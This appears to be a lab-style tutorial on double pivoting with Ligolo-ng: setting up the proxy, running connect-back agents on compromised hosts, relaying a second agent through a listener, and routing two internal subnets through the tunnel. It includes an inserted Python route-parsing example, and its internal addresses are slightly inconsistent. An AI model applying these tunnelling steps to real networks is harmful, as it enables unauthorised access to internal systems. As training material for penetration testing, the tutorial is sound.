Scenario
In this scenario, we assume that we have already compromised the target machine, and our objective is to reach the internal network from our own Kali VM.
Our attacker machine is assigned the IP address 10.10.16.38, the target machine (the pivot machine) is located at 10.129.214.109, and there are two internal machines, 172.16.5.35 and 172.16.6.25. Having compromised the target machine, we can start double pivoting. With double pivoting we gain access to both internal machines within the internal network, so we can explore and interact with them from our attacker machine.
Note: If you are a visual learner I would recommend this YouTube video I found very helpful :)
Setup Ligolo-ng
Before using Ligolo-ng, we need to obtain two executable files.
The first file is the PROXY, which functions as a C2 (Command and Control) server responsible for managing the connected pivot machines and facilitating tunneling operations.
The second file is the AGENT, which acts as the client that connects back to the proxy server. The AGENT enables communication and interaction with the compromised machine.
Downloading and setting up the Proxy on our own Kali machine
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
Extracting the file
tar -xvf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
Adding the ligolo interface
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
We have successfully set up the ligolo interface.
Using Ligolo-ng
Run ./proxy -h for help.
To start the proxy with a self-signed certificate, run ./proxy -selfcert. The proxy then listens on the default port 11601. If you want a different listener port, run ./proxy -selfcert -laddr 0.0.0.0:1234, where 1234 is the desired port; the proxy then listens on all network interfaces (0.0.0.0) on that port.
Transfer the agent file to the target machine and run chmod +x agent to make it executable, then connect back to the proxy:
./agent -connect 10.10.16.38:11601 -ignore-cert
Agent Binding/Listening
Now, let's switch back to our own machine where the proxy server is running. Note that it may take a few minutes for the connection to establish. Watching the proxy server, we can see that our target machine has joined and established a connection.
To enter the session, type session and select it. To verify the host's network connectivity, run the ifconfig command inside the session. The output shows that the host is connected to the internal network through interface 2.
To make the internal network reachable from our host machine, we need to add the internal subnet to our routing table, pointing it at the ligolo interface so that traffic for that subnet is routed into the tunnel:
sudo ip route add 172.16.5/24 dev ligolo
ip route
On the proxy server, in the current session, execute the command start to initiate tunneling.
As a result, we gain the capability to interact with and access the resources within the Internal Network from our Kali VM.
Now imagine we have somehow obtained a reverse shell on the Internal-1 machine, i.e. the Windows host (172.16.5.35). Its two IP addresses on Eth0 and Eth2 belong to the same subnet but are distinct host addresses within it, and this Windows host has access to the 172.16.6 subnet. However, if we want to enumerate the machines within the 172.16.6.0/24 subnet from our own Kali VM, we need to add an additional route to our routing table.
To proceed, we need to transfer the agent file to the Windows host. Please ensure that you use the appropriate file for Windows, which is agent.exe. Once the file has been transferred successfully, execute the agent.exe file on the Windows host.
First, we need to add an additional listener on the proxy server. This listener will carry the connection between the internal machine and the proxy server.
By executing the command listener_add --addr 172.16.5.15:4455 --to 127.0.0.1:11601 in the pivot's session, we configure a listener on the proxy server. This listener redirects any connection made to the target machine at IP address 172.16.5.15 on port 4455 to our local host machine, specifically to port 11601 where our proxy server is running. In essence, this configuration lets us relay incoming connections from the target machine to our own proxy server.
From the Internal-1 machine we send an agent request to that listener address, i.e. the target machine's Eth0 IP address (172.16.5.15) on port 4455. The request is forwarded to our own localhost, specifically to port 11601, where our proxy server is running. This redirection establishes a connection between the compromised internal machine and our proxy server, letting us monitor and control it.
Agent Joined
To select the appropriate session, type session and choose from the available sessions. Since we have two sessions to choose from, we can select the desired session that corresponds to the target machine or the internal network we want to interact with
Now, let's add the IP range 172.16.6.0/24 to our routing table. By including this range, we ensure that our system can communicate with and access the machines within the 172.16.6 subnet.
sudo ip route add 172.16.6/24 dev ligolo
ip route
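The two route additions above (172.16.5/24 after the first pivot, 172.16.6/24 after the second) work because the kernel picks the most specific matching route; until the second route exists, traffic for 172.16.6.25 falls through to the default route and never enters the tunnel. The following added example (not part of the original post or of Ligolo-ng) parses constructed ip route output and shows which interface each destination from this walkthrough would use; the default gateway 10.10.16.1 and the eth0 name are assumptions.

```python
import ipaddress

# Constructed sample of `ip route` output on the Kali VM after the first pivot.
# Subnets follow the walkthrough; the gateway and eth0 are assumed.
IP_ROUTE_AFTER_FIRST_PIVOT = """\
default via 10.10.16.1 dev eth0
10.10.16.0/24 dev eth0 proto kernel scope link src 10.10.16.38
172.16.5.0/24 dev ligolo scope link
"""

# The same table after `sudo ip route add 172.16.6/24 dev ligolo`.
IP_ROUTE_AFTER_SECOND_PIVOT = (
    IP_ROUTE_AFTER_FIRST_PIVOT + "172.16.6.0/24 dev ligolo scope link\n"
)


def parse_ip_route(text):
    """Parse `ip route` output into (network, device) pairs.
    'default' is the 0.0.0.0/0 route; the device name follows the 'dev' keyword."""
    routes = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or "dev" not in tokens:
            continue
        prefix = "0.0.0.0/0" if tokens[0] == "default" else tokens[0]
        dev = tokens[tokens.index("dev") + 1]
        routes.append((ipaddress.ip_network(prefix, strict=False), dev))
    return routes


def select_device(routes, dst):
    """Return the interface the kernel would use for dst: among all matching
    routes the longest prefix wins, so a /24 on ligolo beats the default route."""
    addr = ipaddress.ip_address(dst)
    matches = [(net, dev) for net, dev in routes if addr in net]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)[1]


def tunnelled(route_text, dst):
    """True when traffic to dst would be sent into the ligolo tunnel."""
    return select_device(parse_ip_route(route_text), dst) == "ligolo"
```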
Type start in the Internal-1 session to start the tunnel.
This means that we can now establish connections to, interact with, and gather information from the machines within the 172.16.6 subnet from our Kali VM.